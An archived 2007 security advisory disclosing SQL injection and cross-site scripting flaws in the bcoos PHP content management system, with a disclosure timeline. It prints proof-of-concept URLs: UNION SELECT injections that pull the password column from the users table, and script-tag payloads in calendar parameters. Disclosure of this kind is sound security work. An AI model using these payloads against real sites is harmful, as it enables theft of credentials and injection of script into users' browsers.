bcoos-sqlxss.txt

bcoos-sqlxss.txt: Posted Nov 29, 2007; Authored by Lostmon | Site lostmon.blogspot.com; bcoos versions 1.0.10 and below suffer from cross site scripting and SQL injection vulnerabilities.; tags | exploit, vulnerability, xss, sql injection; SHA-256 | 805c22ff1c53330806b6d13752a311149728862efa15a2649a989073efb5d81a; Download | Favorite | View

bcoos-sqlxss.txt

####################################################
Bcoops SQL injection and Cross-site scripting
vendor url: http://www.bcoops.net
Advisore: http://lostmon.blogspot.com/2007/11/
bcoops-sql-injection-and-cross-site.html
vendor notify:YES exploits available: YES
####################################################



bcoos is content-community management system written in PHP-MySQL.

bcoops contains a flaw that may allow an attacker to carry out
an SQL injection attack. The issue is due to the arcade/index.php
script not properly sanitizing user-supplied input to the 'gid'
variable,and myalbum/ratephoto.php script and 'lid' variable are
afected by the same flaw This may allow an attacker to inject or
manipulate SQL queries in the backend database.



bccops contains too a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate the
'day' and 'year' variable upon submission to modules/theecal/display.php
script. This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the trust
relationship between the browser and the server, leading to
a loss of integrity


#################
Versions:
#################

bcoops 1.0.10 =< vulnerable

#################
Solution:
#################

No solution at this time !!!

#################
Timeline:
#################

Discovered:25-11-2007
vendor notify:27-11-2007
vendor response:-------
disclosure:28-11-2007


#################
SQL intections:
#################

http://localhost/modules/arcade/index.php?act=show_stats
&gid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201

http://localhost/modules/myalbum/ratephoto.php?
lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201

http://localhost/modules/mylinks/ratelink.php?
lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201


#####################
Cross-site Scripting
#####################


http://localhost/modules/ecal/display.php?
day=17&month=11&year=2007"><script>alert()</script>


http://localhost/modules/ecal/display.php?
day=1"><script>alert()</script>&month=11&year=2007



####################### €nd ##################################



Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com


-- 
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Top Authors In Last 30 Days

Red Hat 205 files
Ubuntu 84 files
Gentoo 31 files
Debian 21 files
tmrswrr 10 files
Sina Kheirkhah 7 files
bRpsd 4 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
Google Security Research 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,078)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,350)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,266)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,658)
UNIX (9,425)
UnixWare (187)
Windows (6,666)
Other

bcoos-sqlxss.txt

bcoos-sqlxss.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

bcoos-sqlxss.txt

Share This

bcoos-sqlxss.txt

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems